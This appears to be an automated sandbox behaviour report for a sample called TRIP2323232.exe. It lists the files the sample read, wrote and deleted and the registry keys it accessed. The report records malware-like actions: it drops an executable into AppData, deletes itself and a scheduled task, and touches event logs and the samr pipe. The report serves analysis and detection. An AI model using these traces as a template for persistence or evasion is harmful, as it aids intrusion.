C:\Windows\Fonts\estre.ttf
C:\Windows\Fonts\euphemia.ttf
C:\Windows\Fonts\gautami.ttf
C:\Windows\Fonts\gautamib.ttf
C:\Windows\Fonts\Vani.ttf
C:\Windows\Fonts\Vanib.ttf
C:\Windows\Fonts\gulim.ttc
C:\Windows\Fonts\impact.ttf
C:\Windows\Fonts\iskpota.ttf
C:\Windows\Fonts\iskpotab.ttf
C:\Windows\Fonts\kalinga.ttf
C:\Windows\Fonts\kalingab.ttf
C:\Windows\Fonts\kartika.ttf
C:\Windows\Fonts\kartikab.ttf
C:\Windows\Fonts\KhmerUI.ttf
C:\Windows\Fonts\KhmerUIb.ttf
C:\Windows\Fonts\LaoUI.ttf
C:\Windows\Fonts\LaoUIb.ttf
C:\Windows\Fonts\latha.ttf
C:\Windows\Fonts\lathab.ttf
C:\Windows\Fonts\lucon.ttf
C:\Windows\Fonts\malgun.ttf
C:\Windows\Fonts\malgunbd.ttf
C:\Windows\Fonts\mangal.ttf
C:\Windows\Fonts\mangalb.ttf
C:\Windows\Fonts\meiryo.ttc
C:\Windows\Fonts\meiryob.ttc
C:\Windows\Fonts\himalaya.ttf
C:\Windows\Fonts\msjh.ttf
C:\Windows\Fonts\msjhbd.ttf
C:\Windows\Fonts\msyh.ttf
C:\Windows\Fonts\msyhbd.ttf
C:\Windows\Fonts\mingliu.ttc
C:\Windows\Fonts\mingliub.ttc
C:\Windows\Fonts\monbaiti.ttf
C:\Windows\Fonts\msgothic.ttc
C:\Windows\Fonts\msmincho.ttc
C:\Windows\Fonts\mvboli.ttf
C:\Windows\Fonts\ntailu.ttf
C:\Windows\Fonts\ntailub.ttf
C:\Windows\Fonts\nyala.ttf
C:\Windows\Fonts\phagspa.ttf
C:\Windows\Fonts\phagspab.ttf
C:\Windows\Fonts\plantc.ttf
C:\Windows\Fonts\raavi.ttf
C:\Windows\Fonts\raavib.ttf
C:\Windows\Fonts\segoesc.ttf
C:\Windows\Fonts\segoescb.ttf
C:\Windows\Fonts\segoeui.ttf
C:\Windows\Fonts\segoeuib.ttf
C:\Windows\Fonts\segoeuii.ttf
C:\Windows\Fonts\segoeuiz.ttf
C:\Windows\Fonts\seguisb.ttf
C:\Windows\Fonts\segoeuil.ttf
C:\Windows\Fonts\seguisym.ttf
C:\Windows\Fonts\shruti.ttf
C:\Windows\Fonts\shrutib.ttf
C:\Windows\Fonts\simsun.ttc
C:\Windows\Fonts\simsunb.ttf
C:\Windows\Fonts\sylfaen.ttf
C:\Windows\Fonts\taile.ttf
C:\Windows\Fonts\taileb.ttf
C:\Windows\Fonts\times.ttf
C:\Windows\Fonts\timesi.ttf
C:\Windows\Fonts\timesbd.ttf
C:\Windows\Fonts\timesbi.ttf
C:\Windows\Fonts\tunga.ttf
C:\Windows\Fonts\tungab.ttf
C:\Windows\Fonts\vrinda.ttf
C:\Windows\Fonts\vrindab.ttf
C:\Windows\Fonts\Shonar.ttf
C:\Windows\Fonts\Shonarb.ttf
C:\Windows\Fonts\msyi.ttf
C:\Windows\Fonts\tahoma.ttf
C:\Windows\Fonts\tahomabd.ttf
C:\Windows\Fonts\micross.ttf
C:\Windows\Fonts\angsa.ttf
C:\Windows\Fonts\angsai.ttf
C:\Windows\Fonts\angsab.ttf
C:\Windows\Fonts\angsaz.ttf
C:\Windows\Fonts\aparaj.ttf
C:\Windows\Fonts\aparajb.ttf
C:\Windows\Fonts\aparajbi.ttf
C:\Windows\Fonts\aparaji.ttf
C:\Windows\Fonts\cordia.ttf
C:\Windows\Fonts\cordiai.ttf
C:\Windows\Fonts\cordiab.ttf
C:\Windows\Fonts\cordiaz.ttf
C:\Windows\Fonts\ebrima.ttf
C:\Windows\Fonts\ebrimabd.ttf
C:\Windows\Fonts\gisha.ttf
C:\Windows\Fonts\gishabd.ttf
C:\Windows\Fonts\kokila.ttf
C:\Windows\Fonts\kokilab.ttf
C:\Windows\Fonts\kokilabi.ttf
C:\Windows\Fonts\kokilai.ttf
C:\Windows\Fonts\leelawad.ttf
C:\Windows\Fonts\leelawdb.ttf
C:\Windows\Fonts\msuighur.ttf
C:\Windows\Fonts\moolbor.ttf
C:\Windows\Fonts\symbol.ttf
C:\Windows\Fonts\utsaah.ttf
C:\Windows\Fonts\utsaahb.ttf
C:\Windows\Fonts\utsaahbi.ttf
C:\Windows\Fonts\utsaahi.ttf
C:\Windows\Fonts\vijaya.ttf
C:\Windows\Fonts\vijayab.ttf
C:\Windows\Fonts\wingding.ttf
C:\Windows\Fonts\modern.fon
C:\Windows\Fonts\roman.fon
C:\Windows\Fonts\script.fon
C:\Windows\Fonts\andlso.ttf
C:\Windows\Fonts\arabtype.ttf
C:\Windows\Fonts\simpo.ttf
C:\Windows\Fonts\simpbdo.ttf
C:\Windows\Fonts\simpfxo.ttf
C:\Windows\Fonts\majalla.ttf
C:\Windows\Fonts\majallab.ttf
C:\Windows\Fonts\trado.ttf
C:\Windows\Fonts\tradbdo.ttf
C:\Windows\Fonts\ahronbd.ttf
C:\Windows\Fonts\david.ttf
C:\Windows\Fonts\davidbd.ttf
C:\Windows\Fonts\frank.ttf
C:\Windows\Fonts\lvnm.ttf
C:\Windows\Fonts\lvnmbd.ttf
C:\Windows\Fonts\mriam.ttf
C:\Windows\Fonts\mriamc.ttf
C:\Windows\Fonts\nrkis.ttf
C:\Windows\Fonts\rod.ttf
C:\Windows\Fonts\simfang.ttf
C:\Windows\Fonts\simhei.ttf
C:\Windows\Fonts\simkai.ttf
C:\Windows\Fonts\angsau.ttf
C:\Windows\Fonts\angsaui.ttf
C:\Windows\Fonts\angsaub.ttf
C:\Windows\Fonts\angsauz.ttf
C:\Windows\Fonts\browa.ttf
C:\Windows\Fonts\browai.ttf
C:\Windows\Fonts\browab.ttf
C:\Windows\Fonts\browaz.ttf
C:\Windows\Fonts\browau.ttf
C:\Windows\Fonts\browaui.ttf
C:\Windows\Fonts\browaub.ttf
C:\Windows\Fonts\browauz.ttf
C:\Windows\Fonts\cordiau.ttf
C:\Windows\Fonts\cordiaub.ttf
C:\Windows\Fonts\cordiauz.ttf
C:\Windows\Fonts\cordiaui.ttf
C:\Windows\Fonts\upcdl.ttf
C:\Windows\Fonts\upcdi.ttf
C:\Windows\Fonts\upcdb.ttf
C:\Windows\Fonts\upcdbi.ttf
C:\Windows\Fonts\upcel.ttf
C:\Windows\Fonts\upcei.ttf
C:\Windows\Fonts\upceb.ttf
C:\Windows\Fonts\upcebi.ttf
C:\Windows\Fonts\upcfl.ttf
C:\Windows\Fonts\upcfi.ttf
C:\Windows\Fonts\upcfb.ttf
C:\Windows\Fonts\upcfbi.ttf
C:\Windows\Fonts\upcil.ttf
C:\Windows\Fonts\upcii.ttf
C:\Windows\Fonts\upcib.ttf
C:\Windows\Fonts\upcibi.ttf
C:\Windows\Fonts\upcjl.ttf
C:\Windows\Fonts\upcji.ttf
C:\Windows\Fonts\upcjb.ttf
C:\Windows\Fonts\upcjbi.ttf
C:\Windows\Fonts\upckl.ttf
C:\Windows\Fonts\upcki.ttf
C:\Windows\Fonts\upckb.ttf
C:\Windows\Fonts\upckbi.ttf
C:\Windows\Fonts\upcll.ttf
C:\Windows\Fonts\upcli.ttf
C:\Windows\Fonts\upclb.ttf
C:\Windows\Fonts\upclbi.ttf
C:\Windows\Fonts\kaiu.ttf
C:\Windows\Fonts\l_10646.ttf
C:\Windows\Fonts\ariblk.ttf
C:\Windows\Fonts\calibri.ttf
C:\Windows\Fonts\calibrii.ttf
C:\Windows\Fonts\calibrib.ttf
C:\Windows\Fonts\calibriz.ttf
C:\Windows\Fonts\cambria.ttc
C:\Windows\Fonts\cambriai.ttf
C:\Windows\Fonts\cambriab.ttf
C:\Windows\Fonts\cambriaz.ttf
C:\Windows\Fonts\Candara.ttf
C:\Windows\Fonts\Candarai.ttf
C:\Windows\Fonts\Candarab.ttf
C:\Windows\Fonts\Candaraz.ttf
C:\Windows\Fonts\comic.ttf
C:\Windows\Fonts\comicbd.ttf
C:\Windows\Fonts\consola.ttf
C:\Windows\Fonts\consolai.ttf
C:\Windows\Fonts\consolab.ttf
C:\Windows\Fonts\consolaz.ttf
C:\Windows\Fonts\constan.ttf
C:\Windows\Fonts\constani.ttf
C:\Windows\Fonts\constanb.ttf
C:\Windows\Fonts\constanz.ttf
C:\Windows\Fonts\corbel.ttf
C:\Windows\Fonts\corbeli.ttf
C:\Windows\Fonts\corbelb.ttf
C:\Windows\Fonts\corbelz.ttf
C:\Windows\Fonts\framd.ttf
C:\Windows\Fonts\framdit.ttf
C:\Windows\Fonts\Gabriola.ttf
C:\Windows\Fonts\georgia.ttf
C:\Windows\Fonts\georgiai.ttf
C:\Windows\Fonts\georgiab.ttf
C:\Windows\Fonts\georgiaz.ttf
C:\Windows\Fonts\pala.ttf
C:\Windows\Fonts\palai.ttf
C:\Windows\Fonts\palab.ttf
C:\Windows\Fonts\palabi.ttf
C:\Windows\Fonts\segoepr.ttf
C:\Windows\Fonts\segoeprb.ttf
C:\Windows\Fonts\trebuc.ttf
C:\Windows\Fonts\trebucit.ttf
C:\Windows\Fonts\trebucbd.ttf
C:\Windows\Fonts\trebucbi.ttf
C:\Windows\Fonts\verdana.ttf
C:\Windows\Fonts\verdanai.ttf
C:\Windows\Fonts\verdanab.ttf
C:\Windows\Fonts\verdanaz.ttf
C:\Windows\Fonts\webdings.ttf
C:\Windows\Fonts\coure.fon
C:\Windows\Fonts\serife.fon
C:\Windows\Fonts\sserife.fon
C:\Windows\Fonts\smalle.fon
C:\Windows\Fonts\smallf.fon
C:\PROGRAM FILES\COMMON FILES\MICROSOFT SHARED\EQUATION\MTEXTRA.TTF
C:\Windows\Fonts\ARIALUNI.TTF
C:\Windows\Fonts\CENTURY.TTF
C:\Windows\Fonts\WINGDNG2.TTF
C:\Windows\Fonts\WINGDNG3.TTF
C:\Windows\Fonts\BKANT.TTF
C:\Windows\Fonts\GOTHIC.TTF
C:\Windows\Fonts\OUTLOOK.TTF
C:\Windows\Fonts\TEMPSITC.TTF
C:\Windows\Fonts\MISTRAL.TTF
C:\Windows\Fonts\LHANDW.TTF
C:\Windows\Fonts\ITCKRIST.TTF
C:\Windows\Fonts\JUICE___.TTF
C:\Windows\Fonts\FREESCPT.TTF
C:\Windows\Fonts\ARIALN.TTF
C:\Windows\Fonts\GARA.TTF
C:\Windows\Fonts\MTCORSVA.TTF
C:\Windows\Fonts\ALGER.TTF
C:\Windows\Fonts\BASKVILL.TTF
C:\Windows\Fonts\BAUHS93.TTF
C:\Windows\Fonts\BELL.TTF
C:\Windows\Fonts\BRLNSB.TTF
C:\Windows\Fonts\BERNHC.TTF
C:\Windows\Fonts\BOD_PSTC.TTF
C:\Windows\Fonts\BRITANIC.TTF
C:\Windows\Fonts\BROADW.TTF
C:\Windows\Fonts\BRUSHSCI.TTF
C:\Windows\Fonts\CALIFR.TTF
C:\Windows\Fonts\CENTAUR.TTF
C:\Windows\Fonts\CHILLER.TTF
C:\Windows\Fonts\COLONNA.TTF
C:\Windows\Fonts\COOPBL.TTF
C:\Windows\Fonts\FTLTLT.TTF
C:\Windows\Fonts\HARLOWSI.TTF
C:\Windows\Fonts\HARNGTON.TTF
C:\Windows\Fonts\HTOWERT.TTF
C:\Windows\Fonts\JOKERMAN.TTF
C:\Windows\Fonts\KUNSTLER.TTF
C:\Windows\Fonts\LBRITE.TTF
C:\Windows\Fonts\LCALLIG.TTF
C:\Windows\Fonts\LFAX.TTF
C:\Windows\Fonts\MAGNETOB.TTF
C:\Windows\Fonts\MATURASC.TTF
C:\Windows\Fonts\MOD20.TTF
C:\Windows\Fonts\NIAGENG.TTF
C:\Windows\Fonts\NIAGSOL.TTF
C:\Windows\Fonts\OLDENGL.TTF
C:\Windows\Fonts\ONYX.TTF
C:\Windows\Fonts\PARCHM.TTF
C:\Windows\Fonts\PLAYBILL.TTF
C:\Windows\Fonts\POORICH.TTF
C:\Windows\Fonts\RAVIE.TTF
C:\Windows\Fonts\INFROMAN.TTF
C:\Windows\Fonts\SHOWG.TTF
C:\Windows\Fonts\SNAP____.TTF
C:\Windows\Fonts\STENCIL.TTF
C:\Windows\Fonts\VINERITC.TTF
C:\Windows\Fonts\VIVALDII.TTF
C:\Windows\Fonts\VLADIMIR.TTF
C:\Windows\Fonts\LATINWD.TTF
C:\Windows\Fonts\BOOKOS.TTF
C:\Windows\Fonts\ANTQUAB.TTF
C:\Windows\Fonts\ANTQUABI.TTF
C:\Windows\Fonts\ANTQUAI.TTF
C:\Windows\Fonts\GOTHICB.TTF
C:\Windows\Fonts\GOTHICBI.TTF
C:\Windows\Fonts\GOTHICI.TTF
C:\Windows\Fonts\BSSYM7.TTF
C:\Windows\Fonts\REFSAN.TTF
C:\Windows\Fonts\REFSPCL.TTF
C:\Windows\Fonts\ARIALNB.TTF
C:\Windows\Fonts\ARIALNBI.TTF
C:\Windows\Fonts\ARIALNI.TTF
C:\Windows\Fonts\GARABD.TTF
C:\Windows\Fonts\GARAIT.TTF
C:\Windows\Fonts\BELLB.TTF
C:\Windows\Fonts\BELLI.TTF
C:\Windows\Fonts\BRLNSDB.TTF
C:\Windows\Fonts\BRLNSR.TTF
C:\Windows\Fonts\CALIFB.TTF
C:\Windows\Fonts\CALIFI.TTF
C:\Windows\Fonts\HTOWERTI.TTF
C:\Windows\Fonts\LBRITED.TTF
C:\Windows\Fonts\LBRITEDI.TTF
C:\Windows\Fonts\LBRITEI.TTF
C:\Windows\Fonts\LFAXD.TTF
C:\Windows\Fonts\LFAXDI.TTF
C:\Windows\Fonts\LFAXI.TTF
C:\Windows\Fonts\BOOKOSB.TTF
C:\Windows\Fonts\BOOKOSBI.TTF
C:\Windows\Fonts\BOOKOSI.TTF
C:\Windows\Fonts\marlett.ttf
\??\PIPE\wkssvc
C:\DosDevices\pipe\
C:\Windows\sysnative\dfdts.dll
C:\Windows\sysnative\winevt\Logs\Microsoft-Windows-WindowsBackup%4ActionCenter.evtx
C:\Windows\sysnative\winevt\Logs\Microsoft-Windows-WindowsUpdateClient%4Operational.evtx
C:\Windows\sysnative\winevt\Logs\Microsoft-Windows-NetworkAccessProtection%4WHC.evtx
C:\Windows\sysnative\winevt\Logs\Microsoft-Windows-Windows Defender%4WHC.evtx
C:\Windows\sysnative\winevt\Logs\Microsoft-Windows-Diagnosis-Scheduled%4Operational.evtx
C:\Windows\sysnative\winevt\Logs\System.evtx
C:\Windows\sysnative\RacEngn.dll
C:\Windows\sysnative\winevt\Logs\Microsoft-Windows-ReliabilityAnalysisComponent%4Operational.evtx
C:\Windows\sysnative\wbem\WinMgmtR.dll
C:\Windows\sysnative\shell32.dll
C:\Windows\sysnative\winevt\Logs\Microsoft-Windows-Known Folders API Service.evtx
C:\Windows\sysnative\oleres.dll
C:\Windows\sysnative\it-IT\KERNELBASE.dll.mui
C:\Windows\sysnative\dfdts.dll.manifest
C:\Windows\sysnative\dfdts.dll.123.Manifest
C:\Windows\sysnative\dfdts.dll.124.Manifest
C:\Windows\sysnative\dfdts.dll.2.Manifest
C:\Windows\sysnative\rundll32.exe
C:\ProgramData\Microsoft\Windows\Sqm\Sessions
C:\ProgramData\Microsoft\Windows\Sqm\Sessions\*.psqm
C:\ProgramData\Microsoft\Windows\Sqm\Upload
C:\ProgramData\Microsoft\Windows\Sqm\Upload\*.sqm
C:\ProgramData\Microsoft\Windows\Sqm\Manifest
C:\ProgramData\Microsoft\Windows\Sqm\Manifest\*.bin
C:\Windows\sysnative\LogFiles\SQM
C:\Windows\sysnative\LogFiles\SQM\SqmLogger*.etl.*
C:\Windows\sysnative\Tasks
C:\Windows\sysnative\Tasks\*
C:\Windows\sysnative\Tasks\Adobe Flash Player Updater
C:\Windows\sysnative\Tasks\Microsoft\Windows\Customer Experience Improvement Program\Uploader
C:\Windows\sysnative\advapi32.dll
C:\Windows\sysnative\it-IT\advapi32.dll.mui
C:\Windows\sysnative\drivers\acpi.sys
C:\Windows\sysnative\drivers\it-IT\ACPI.sys.mui
C:\Windows\sysnative\drivers\ndis.sys
C:\Windows\sysnative\drivers\it-IT\ndis.sys.mui
C:\Windows\sysnative\drivers\mssmbios.sys
C:\Windows\sysnative\drivers\it-IT\mssmbios.sys.mui
C:\Windows\sysnative\drivers\hdaudbus.sys
C:\Windows\sysnative\drivers\it-IT\HDAudBus.sys.mui
C:\Windows\sysnative\drivers\intelppm.sys
C:\Windows\sysnative\drivers\it-IT\intelppm.sys.mui
C:\Windows\sysnative\drivers\portcls.sys
C:\Windows\sysnative\drivers\it-IT\portcls.SYS.mui
C:\Windows\sysnative\drivers\monitor.sys
C:\Windows\sysnative\drivers\it-IT\monitor.sys
C:\Windows\sysnative\drivers\it\monitor.sys
\??\MountPointManager
C:\Windows\sysnative\wbem\WMIADAP.exe
C:\Windows\sysnative
C:\Windows\sysnative\wbem
C:\Windows\appcompat\Programs\RecentFileCache.bcf
C:\Windows\AppPatch\AppPatch64\sysmain.sdb
C:\Windows\sysnative\wbem\
C:\Windows\SysWOW64\net.exe
C:\Windows\SysWOW64
C:\Windows\AppPatch\sysmain.sdb
C:\Windows\SysWOW64\
C:\Windows\SysWOW64\*.*
C:\Windows\SysWOW64\ui\SwDRM.dll
C:\Windows\SysWOW64\net1.exe
C:\Windows\Temp\fwtsqmfile00.sqm
C:\Windows\Temp\fwtsqmfile01.sqm
C:\Windows\SysWOW64\sc.exe
C:\Windows\SysWOW64\it-IT\sc.exe.mui
C:\Windows\sysnative\wbem\WmiPrvSE.exe
C:\Windows\sysnative\wbem\MOF
C:\Windows\sysnative\wbem\MOF\bad\
C:\Windows\sysnative\wbem\MOF\good\
C:\Windows\sysnative\wbem\MOF\*
\??\WMIDataDevice
C:\Windows\sysnative\it-IT\VssTrace.DLL.mui
\??\PIPE\samr
C:\Windows\sysnative\wbem\repository
C:\Windows\sysnative\wbem\Logs
C:\Windows\sysnative\wbem\AutoRecover
C:\Windows\sysnative\wbem\repository\INDEX.BTR
C:\Windows\sysnative\wbem\repository\WRITABLE.TST
C:\Windows\sysnative\wbem\repository\MAPPING1.MAP
C:\Windows\sysnative\wbem\repository\MAPPING2.MAP
C:\Windows\sysnative\wbem\repository\MAPPING3.MAP
C:\Windows\sysnative\wbem\repository\OBJECTS.DATA
\??\pipe\PIPE_EVENTROOT\CIMV2PROVIDERSUBSYSTEM
\??\pipe\PIPE_EVENTROOT\CIMV2WMI SELF-INSTRUMENTATION EVENT PROVIDER
C:\Windows\sysnative\it-IT\USER32.dll.mui
C:\Windows\sysnative\it-IT\ADVAPI32.dll.mui
C:\Windows\sysnative\wbem\it-IT\mofd.dll.mui

Read Files

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll
C:\Users\Seven01\AppData\Local\Temp\TRIP2323232.exe.config
C:\Users\Seven01\AppData\Local\Temp\TRIP2323232.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e\msvcr80.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch
C:\Windows\assembly\NativeImages_v2.0.50727_32\index126.dat
C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
C:\Windows\System32\l_intl.nls
\Device\KsecDD
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll
C:\Windows\assembly\pubpol36.dat
C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\3afcd5168c7a6cb02eab99d7fd71e102\System.Windows.Forms.ni.dll
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
C:\Windows\Microsoft.NET\Framework\v2.0.50727\Culture.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it\mscorrc.dll
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.dll
C:\Windows\System32\netapi32.dll
C:\Windows\System32\netutils.dll
C:\Windows\System32\srvcli.dll
C:\Users\Seven01\AppData\Roaming\E62877\73E4A9.lck
C:\Windows\sysnative\LogFiles\Scm\046fbef8-2dd6-4a92-a08e-608464edcc44
C:\Windows\sysnative\LogFiles\Scm\c016366b-7126-46ca-b36b-592a3d95a60b
C:\Windows\sysnative\LogFiles\Scm\2f57269b-1e09-4e2d-ab1e-b0fdac7d279c
C:\Windows\sysnative\LogFiles\Scm\994c86ad-a929-4b2c-88a0-4e25a107a029
C:\Windows\sysnative\LogFiles\Scm\044a6734-e90e-4f8f-b357-b2dc8ab3b5ec
C:\Windows\sysnative\LogFiles\Scm\47536d45-eeec-4bdc-8183-a4dc1f8da9e4
C:\Windows\sysnative\LogFiles\Scm\5c0aeeea-c154-45be-8499-bea5f11baff6
C:\Windows\sysnative\LogFiles\Scm\a7c73732-9f11-4281-8d19-764d4ec9d94d
C:\Windows\sysnative\LogFiles\Scm\ac4e5acf-89f7-4220-ba21-81ee183975e2
C:\Windows\sysnative\LogFiles\Scm\b4bdb6a0-417f-4e60-a0ac-aa00b1c79b4c
C:\Windows\sysnative\LogFiles\Scm\be669c13-8165-4536-96d0-6d6c39292aae
C:\Windows\sysnative\LogFiles\Scm\ca4b8ff2-a4d2-4d88-a52e-3a5bdaf7f56e
C:\Windows\sysnative\LogFiles\Scm\eaca24ff-236c-401d-a1e7-b3d5267b8a50
C:\Windows\sysnative\LogFiles\Scm\fb3c354d-297a-4eb2-9b58-090f6361906b
C:\Windows\sysnative\LogFiles\Scm\fdd56c73-f0d5-41b6-b767-6effd7966428
C:\Windows\sysnative\it-IT\radarrs.dll.mui
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache-System.dat
C:\Windows\Fonts\modern.fon
C:\Windows\Fonts\roman.fon
C:\Windows\Fonts\script.fon
C:\Windows\Fonts\coure.fon
C:\Windows\Fonts\serife.fon
C:\Windows\Fonts\sserife.fon
C:\Windows\Fonts\smalle.fon
C:\Windows\Fonts\smallf.fon
\??\PIPE\wkssvc
C:\Windows\sysnative\dfdts.dll
C:\Windows\sysnative\winevt\Logs\Microsoft-Windows-WindowsUpdateClient%4Operational.evtx
C:\Windows\sysnative\winevt\Logs\Microsoft-Windows-NetworkAccessProtection%4WHC.evtx
C:\Windows\sysnative\winevt\Logs\Microsoft-Windows-Windows Defender%4WHC.evtx
C:\Windows\sysnative\winevt\Logs\Microsoft-Windows-Diagnosis-Scheduled%4Operational.evtx
C:\Windows\sysnative\RacEngn.dll
C:\Windows\sysnative\winevt\Logs\Microsoft-Windows-ReliabilityAnalysisComponent%4Operational.evtx
C:\Windows\sysnative\wbem\WinMgmtR.dll
C:\Windows\sysnative\shell32.dll
C:\Windows\sysnative\winevt\Logs\Microsoft-Windows-Known Folders API Service.evtx
C:\Windows\sysnative\oleres.dll
C:\Windows\sysnative\it-IT\KERNELBASE.dll.mui
C:\Windows\sysnative\dfdts.dll.123.Manifest
C:\Windows\sysnative\dfdts.dll.124.Manifest
C:\Windows\sysnative\dfdts.dll.2.Manifest
C:\Windows\sysnative\rundll32.exe
C:\Windows\sysnative\Tasks\Microsoft\Windows\Customer Experience Improvement Program\Uploader
C:\Windows\sysnative\advapi32.dll
C:\Windows\sysnative\drivers\acpi.sys
C:\Windows\sysnative\drivers\ndis.sys
C:\Windows\sysnative\drivers\mssmbios.sys
C:\Windows\sysnative\drivers\hdaudbus.sys
C:\Windows\sysnative\drivers\intelppm.sys
C:\Windows\sysnative\drivers\portcls.sys
C:\Windows\sysnative\drivers\monitor.sys
C:\Windows\sysnative\wbem\WMIADAP.exe
C:\Windows\appcompat\Programs\RecentFileCache.bcf
C:\Windows\AppPatch\AppPatch64\sysmain.sdb
C:\Windows\sysnative\wbem\
C:\Windows\SysWOW64\net.exe
C:\Windows\AppPatch\sysmain.sdb
C:\Windows\SysWOW64\
C:\Windows\SysWOW64\net1.exe
C:\Windows\Temp\fwtsqmfile01.sqm
C:\Windows\SysWOW64\sc.exe
C:\Windows\SysWOW64\it-IT\sc.exe.mui
C:\Windows\sysnative\wbem\WmiPrvSE.exe
\??\WMIDataDevice
C:\Windows\sysnative\it-IT\VssTrace.DLL.mui
\??\PIPE\samr
C:\Windows\sysnative\wbem\repository\MAPPING1.MAP
C:\Windows\sysnative\wbem\repository\MAPPING2.MAP
C:\Windows\sysnative\wbem\repository\MAPPING3.MAP
C:\Windows\sysnative\wbem\repository\OBJECTS.DATA
C:\Windows\sysnative\wbem\repository\INDEX.BTR
\??\pipe\PIPE_EVENTROOT\CIMV2PROVIDERSUBSYSTEM
\??\pipe\PIPE_EVENTROOT\CIMV2WMI SELF-INSTRUMENTATION EVENT PROVIDER
C:\Windows\sysnative\it-IT\USER32.dll.mui
C:\Windows\sysnative\it-IT\ADVAPI32.dll.mui
C:\Windows\sysnative\wbem\it-IT\mofd.dll.mui

Write Files

C:\Users\Seven01\AppData\Roaming\E62877\73E4A9.lck
C:\Users\Seven01\AppData\Roaming\E62877\73E4A9.exe
C:\Windows\sysnative\LogFiles\Scm\c016366b-7126-46ca-b36b-592a3d95a60b
C:\Windows\sysnative\LogFiles\Scm\9435f817-fed2-454e-88cd-7f78fda62c48
C:\Windows\sysnative\LogFiles\Scm\044a6734-e90e-4f8f-b357-b2dc8ab3b5ec
C:\Windows\sysnative\LogFiles\Scm\046fbef8-2dd6-4a92-a08e-608464edcc44
\??\PIPE\wkssvc
C:\Windows\sysnative\winevt\Logs\Microsoft-Windows-WindowsUpdateClient%4Operational.evtx
C:\Windows\sysnative\winevt\Logs\Microsoft-Windows-NetworkAccessProtection%4WHC.evtx
C:\Windows\sysnative\winevt\Logs\Microsoft-Windows-Windows Defender%4WHC.evtx
C:\Windows\sysnative\winevt\Logs\Microsoft-Windows-Diagnosis-Scheduled%4Operational.evtx
C:\Windows\sysnative\winevt\Logs\Microsoft-Windows-ReliabilityAnalysisComponent%4Operational.evtx
C:\Windows\sysnative\winevt\Logs\Microsoft-Windows-Known Folders API Service.evtx
C:\Windows\appcompat\Programs\RecentFileCache.bcf
C:\Windows\Temp\fwtsqmfile01.sqm
\??\WMIDataDevice
\??\PIPE\samr
C:\Windows\sysnative\wbem\repository\WRITABLE.TST
C:\Windows\sysnative\wbem\repository\MAPPING1.MAP
C:\Windows\sysnative\wbem\repository\MAPPING2.MAP
C:\Windows\sysnative\wbem\repository\MAPPING3.MAP
C:\Windows\sysnative\wbem\repository\OBJECTS.DATA
C:\Windows\sysnative\wbem\repository\INDEX.BTR
\??\pipe\PIPE_EVENTROOT\CIMV2PROVIDERSUBSYSTEM
\??\pipe\PIPE_EVENTROOT\CIMV2WMI SELF-INSTRUMENTATION EVENT PROVIDER

Delete Files

C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2288.31347515
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2288.31347515
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2288.31347765
C:\Users\Seven01\AppData\Roaming\E62877\73E4A9.lck
C:\Users\Seven01\AppData\Local\Temp\trip2323232.exe
C:\Windows\sysnative\Tasks\Microsoft\Windows\Customer Experience Improvement Program\Uploader

Keys

HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\v4.0
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir
HKEY_CURRENT_USER\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR
Policy\Standards
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards\v2.0.50727
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
